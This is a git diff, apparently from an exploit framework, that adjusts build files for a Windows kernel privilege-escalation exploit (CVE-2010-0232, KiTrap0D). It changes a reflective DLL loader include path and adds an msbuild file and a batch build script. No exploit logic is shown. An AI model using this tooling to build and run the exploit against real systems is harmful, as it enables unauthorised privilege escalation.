7bc93fcb93..bacbb7b87f 100755 --- a/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c +++ b/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c @@ -7,7 +7,7 @@ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "../common/ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "kitrap0d.h" diff --git a/external/source/exploits/CVE-2010-0232/make.msbuild b/external/source/exploits/CVE-2010-0232/make.msbuild new file mode 100755 index 0000000000..a44980b045 --- /dev/null +++ b/external/source/exploits/CVE-2010-0232/make.msbuild @@ -0,0 +1,18 @@ + + + + .\kitrap0d.sln + + + + + + + + + + + + + + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat new file mode 100755 index 0000000000..2acf81084f --- /dev/null +++ b/external/source/exploits/make.bat @@ -0,0 +1,39 @@ +@ECHO OFF +IF "%VCINSTALLDIR%" == "" GOTO NEED_VS + +IF "%1"=="x86" GOTO BUILD_X86 +IF "%1"=="X86" GOTO BUILD_X86 +IF "%1"=="x64" GOTO BUILD_X64 +IF "%1"=="X64" GOTO BUILD_X64 + +ECHO "Building Exploits x64 and x86 (Release)" +SET PLAT=all +GOTO RUN + +:BUILD_X86 +ECHO "Building Exploits x86 (Release)" +SET PLAT=x86 +GOTO RUN + +:BUILD_X64 +ECHO "Building Exploits x64 (Release)" +SET PLAT=x64 +GOTO RUN + +:RUN +ECHO "Building CVE-2010-0232 (KiTrap0D)" +PUSHD CVE-2010-0232 +msbuild.exe make.msbuild /target:%PLAT% +POPD + +FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j +SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6% +echo Finished %ldt% + +GOTO :END + +:NEED_VS +ECHO "This command must be executed from within a Visual Studio Command prompt." +ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools" + +:END